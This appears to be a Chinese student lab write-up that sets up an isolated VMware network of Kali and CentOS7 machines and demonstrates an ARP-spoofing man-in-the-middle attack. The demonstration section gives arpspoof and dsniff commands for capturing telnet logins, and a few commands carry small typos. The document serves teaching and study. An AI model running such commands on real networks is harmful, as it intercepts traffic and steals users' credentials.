ARP欺骗配置及演示过程

目录

• 环境
  • 软件
  • 网络拓扑图
• 配置流程
  • 配置构思
  • 具体流程
    • 构建CentOS7_1
    • 设置CentOS7_1网络
    • 设置kali网络
    • 设置CentOS7_2网络
    • 设置CentOS7_3网络
  • 问题
    • 问题1:Kali网络配置完成后仅仅能ping通自己
    • 问题2:同一个网段但是主机不可达
• 演示过程
  • 状态
  • 检查Attack前centOS7_1的ARP地址表
  • 在kali上输入以下命令发动攻击
  • 此时查看centOS7_1的ARP地址表
  • 在centOS7_1上telnet登录centOS7_3
  • 在kali上查看窃取的账号密码
• 参考

环境

软件

• VMware15
• ISO：Kali、centOS7

网络拓扑图

配置流程

配置构思

Kali中已经有相应的工具了，我们只需要将网络配置好就OK，关键就是一个网络配置。以下我按照拓扑图进行构建。

具体流程

构建CentOS7_1

虚拟机的安装不再累赘，仅仅说明一下参数。

• 内存：1G
• 硬盘：20G
• 系统初始：mini最小化安装，就不要装图形了（以最小的代价完成这个演示）

通过yum查看Telnet相关的工具并安装，telnet分为客户端和服务端，*通配一下

[root@localhost]# yum -y install telnet*

在磁盘空间上复制两份作为CentOS7_2、CentOS7_3。

设置CentOS7_1网络

[root@localhost]# ifconfig ens33 192.168.41.2/24					#定义ipv4
[root@localhost]# route add default gw 192.168.41.1/24				#定义默认网关
[root@localhost]# systemctl stop firewalld.service					#关掉防火墙

设置kali网络

[root@localhost]# ifconfig ens33 192.168.41.3/24					#定义ipv4
[root@localhost]# route add default gw 192.168.41.1/24				#定义默认网关

设置CentOS7_2网络

这是一个网关连接两个子网192.168.40.0/24和192.168.41.0/24，所以他本身就会有两个IP地址，在虚拟机配置中添加一个网卡，如图：

查看ip获得网络适配器名称后，配置ipv4地址

[root@localhost]# ifconfig ens33 192.168.41.1/24					#定义适配器ens33 ipv4
[root@localhost]# ifconfig ens37 192.168.40.1/24					#定义适配器ens37 ipv4
[root@localhost]# echo 1 > /proc/sys/net/ipv4/ip_forward			#自动转发
[root@localhost]# route add -net 192.168.41.0/24 gw 192.168.41.1	#配置网关
[root@localhost]# route add -net 192.168.40.0/24 gw 192.168.40.1	#配置网关
[root@localhost]# systemctl stop firewalld.service					#关掉防火墙

设置CentOS7_3网络

同CentOS7_1差不多

[root@localhost]# ifconfig ens33 192.168.40.2/24					#定义ipv4
[root@localhost]# route add default gw 192.168.40.1/24				#定义默认网关
[root@localhost]# systemctl stop firewalld.service					#关掉防火墙

问题

以上如果配置成功就可以使用CentOS7_1 和Kali ping 通CentOS7_3主机。一定要完成这两个ping的验证才行。

问题1:Kali网络配置完成后仅仅能ping通自己

我在实践中第一次使用命令行改的网络配置，只能ping同自己。这不科学cent1能ping通cent3的。然后我在图形界面的设置中修改了静态IP，并关闭虚拟机，检查虚拟网络设置，最后我的配置，如图：(四台除了安装软件时是用的nat，其他都是仅主机模式)

问题2:同一个网段但是主机不可达

网络ip设置没问题，虚拟网络连接没问题。那么这个问题主要是防火墙没关。

演示过程

状态

• CentOS7_1能telnet上CentOS7_3
• Kali ping通CentOS7_2

检查Attack前centOS7_1的ARP地址表

在kali上输入以下命令发动攻击

root@kali:~# echo 1 > /pro/sys/net/ipv4/ip_forward						#自动转发真正的网关
root@kali:~# arpspoof -i -eth0 -t 192.168.41.2 192.168.41.1				#指定目标
root@kali:~# dsniff														#开始嗅探

此时查看centOS7_1的ARP地址表

在centOS7_1上telnet登录centOS7_3

在kali上查看窃取的账号密码

参考

提供一些我在演示过程中参看的博文，都特别的详细。arp都老掉牙了，老师让我们爽一波。。。。。。当然，不是说这个攻击不好使。只不过热衷于追逐新手法，希望老师来波猛的。

CentOS7查看和关闭防火墙

VMware模拟搭建路由环境 这个很标准，符合实际的网络布局，我的稍微简化了些

CentOS 7.4安装telnet服务端

中间人攻击——ARP欺骗的原理、实战及防御